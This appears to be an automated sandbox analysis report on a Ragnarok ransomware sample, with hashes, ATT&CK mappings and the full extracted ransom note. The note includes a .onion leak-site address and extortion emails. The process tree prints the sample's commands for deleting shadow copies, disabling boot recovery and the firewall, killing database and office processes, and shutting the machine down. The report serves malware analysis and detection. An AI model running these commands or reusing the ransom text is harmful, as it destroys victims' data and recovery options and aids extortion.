Analysis

  • max time kernel
    62s
  • max time network
    69s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    27-07-2021 03:33

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    730DBBFB.exe

  • Size

    169KB

  • MD5

    65c3956288e16bdcc55e3c9c6b94ba5b

  • SHA1

    33aa83e00711a32e0960dcf670ae2fa891049170

  • SHA256

    e7fe3b83e1730593d372b5a848e84066c07d75ee4790395a258822cfb8502412

  • SHA512

    813db16eeacf96589468881872ec15e55760dacf27f90060298972036ab22243337abd5f9bce266063a89fccc45ded069cb4bb4172946acc4a54e5ac49853c76

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\!!Read_Me.FC30D.html

Ransom Note
#ALL YOUR FILES ARE ENCRYPTED AND STOLEN BY RAGNAROK Dear Sir Your files are encrypted with RSA4096 and AES encryption algorithm. But don't worry, you can return all your files!! follow the instructions to recover your files Cooperate with us and get the decrypter program as soon as possible will be your best solution. Only our software can decrypt all your encrypted files. What guarantees you have? We take our reputation seriously. We reject any form of deceptionYou can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain any valuable information. When hiring third-party negotiators or recovery companies. listen to what they tell you. try to think. Are they really interested in solving your problems or are they just thinking about their profit and ambitions? By the way.We have stolen lots of your company and your private data which includes doc,xls,pdf,jpg,mdf,sql,pst... Here we upload sample files of your company and your private data on our blog : http://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion/ We promise that if you don't pay within a week, we will package and publish all of your company and your data on our website. We also promise we can decrypt all of your data and delete all your files on internet after your payment. Such leaks of information lead to losses for the company. fines and lawsuits. And don't forget that information can fall into the hands of competitors! For us this is just business and to prove to you our seriousness. Our e-mail: CHRISTIAN1986@TUTANOTA.COM Reserve e-mail: melling@confidential.tips Device ID: =
Emails

CHRISTIAN1986@TUTANOTA.COM

melling@confidential.tips

URLs

http://sushlnty2j7qdzy64qnvyb6ajkwg7resd3p6agc2widnawodtcedgjid.onion/

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 13 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe
    "C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4016
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2680
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3952
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:204
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c bcdedit /set {current} recoveryenabled no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:756
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} recoveryenabled no
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2416
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2224
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        PID:200
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {current} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:2208
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im note*
      2⤵
      PID:3200
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im note*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im powerpnt*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im powerpnt*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3912
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im winword*
      2⤵
      PID:2316
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winword*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2068
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im Exchange*
      2⤵
      PID:1460
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im Exchange*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4104
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im excel*
      2⤵
      PID:652
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im excel*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2680
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im sql*
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:264
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im sql*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3404
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im tomcat*
      2⤵
      PID:3240
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im tomcat*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4224
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im apache*
      2⤵
      PID:3632
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im apache*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im java*
      2⤵
      PID:3036
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im java*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4212
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im vee*
      2⤵
      PID:1564
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im vee*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4264
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im python*
      2⤵
      PID:2676
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im python*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4292
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im mys*
      2⤵
      PID:1832
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im mys*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4308
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c taskkill /f /im post*
      2⤵
      PID:368
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im post*
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4276
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c ping 127.0.0.1>nul & del /q C:\Users\Admin\AppData\Local\Temp\730DBBFB.exe & shutdown -s -t 0
      2⤵
      PID:3116
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:4216
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown -s -t 0
        3⤵
        PID:4456
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3264
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:4784
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:4964
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:5004
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    PID:4364
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:268
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0 /state0:0xa3adc055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:4304
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    PID:284
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    PID:4308

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Modify Existing Service

1
T1031

Defense Evasion

File Deletion

2
T1107

Modify Registry

1
T1112

Discovery

Remote System Discovery

1
T1018

Impact

Inhibit System Recovery

3
T1490

Downloads

  • C:\Users\Admin\Downloads\!!Read_Me.FC30D.html
    MD5

    ba44e2bb1da58363895b9e793c2139cc

    SHA1

    bf3ce91c31e74bdfc2a8d12d348c057b44a3b75a

    SHA256

    1bfe529206c7ed3d1ae135fd2d49a4ff1b59fa8250661833db74a78257b4f169

    SHA512

    581e968f409d3864561c0db437728b5ab4bbe9fc25a081aa64bb42946f34fbba28ee71dee71d49d28a8a7a4abd1d57067da20b7e02fb60a42709b2c4ef085095
